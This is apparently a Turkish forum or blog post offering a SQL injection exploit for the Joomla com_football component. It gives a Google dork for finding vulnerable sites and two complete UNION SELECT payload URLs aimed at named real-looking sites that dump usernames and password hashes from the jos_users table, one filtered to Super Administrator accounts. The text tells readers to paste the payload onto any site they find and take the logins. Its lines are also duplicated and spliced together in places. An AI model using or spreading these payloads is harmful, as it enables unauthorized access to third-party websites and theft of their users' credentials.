joomla com_football Components Sql Injection vulnerability
Selamun Aleyküm Bu Exploit'de Fazla Güncel Sayılmasada Günceldir Pek Bilinmeyen Bir Exp Futbol Sayfalarında Keşfedilmiştir Aslında Sql Açığı Diyebiliriz Ama Joomla Sürümlerinde Çıktığı İçin Exploite Dönüştürmüşler Uzun Lafın Kısası
joomla com_football Components Sql Injection vulnerability :
joomla com_football Components Sql Injection vulnerability :
Exploiti Bulan Arkadaşın Adı : IeDb
Bu Exp'in Dorku :
Exploit :
Ve Benzeri Gibi Şey Görürseniz Orda Joomla com_football Components Sql Injection Vardır
Örnek Site :
Hani Normal Sql Bulup Manuel Giriyoruz Ya Dorku Googleye Yazıp Yukarıda Verdiğim
Gibi Siteler Bulursanız Direk Site.com/ Kadar Silin Ve Örnek Siteler Attığım Sitelerin Devamını Yapıştırın Hiç Uğraşmadan Sql Yapın Username Password'uda Kafanıza Göre Yaparsınız Bu Kadar Arkadaşlar Kullanımı Çok Basit Kolay Gelsin
Bu Exp'in Dorku :
PHP Kod:
index.php?option=com_football Exploit :
PHP Kod:
http://www.Site.com/index.php?option=com_football&task=viewteam&teamID Ve Benzeri Gibi Şey Görürseniz Orda Joomla com_football Components Sql Injection Vardır
Örnek Site :
PHP Kod:
http://www.cvhspreps.com/index.php?option=com_football&task=viewteam&tea%20%20mID=-1+union+select+null,null,3,4,5,6,concat%20%28username,0x3a,password%20%20%29,8+from+jos_users+where+usertype=0x53757065722041646d696e697374726174%20%206f72--
PHP Kod:
http://www.sv-gruenbach.at/index.php?option=com_football&task=viewteam&teamID=-1+UNION+SELECT+1,2,group_concat%28username,0x3a,password%29,4,5+from+jos_users-- Hani Normal Sql Bulup Manuel Giriyoruz Ya Dorku Googleye Yazıp Yukarıda Verdiğim
PHP Kod:
http://www.Site.com/index.php?option=com_football&task=viewteam&teamID Gibi Siteler Bulursanız Direk Site.com/ Kadar Silin Ve Örnek Siteler Attığım Sitelerin Devamını Yapıştırın Hiç Uğraşmadan Sql Yapın Username Password'uda Kafanıza Göre Yaparsınız Bu Kadar Arkadaşlar Kullanımı Çok Basit Kolay Gelsin
0 yorum:
Yorum Gönder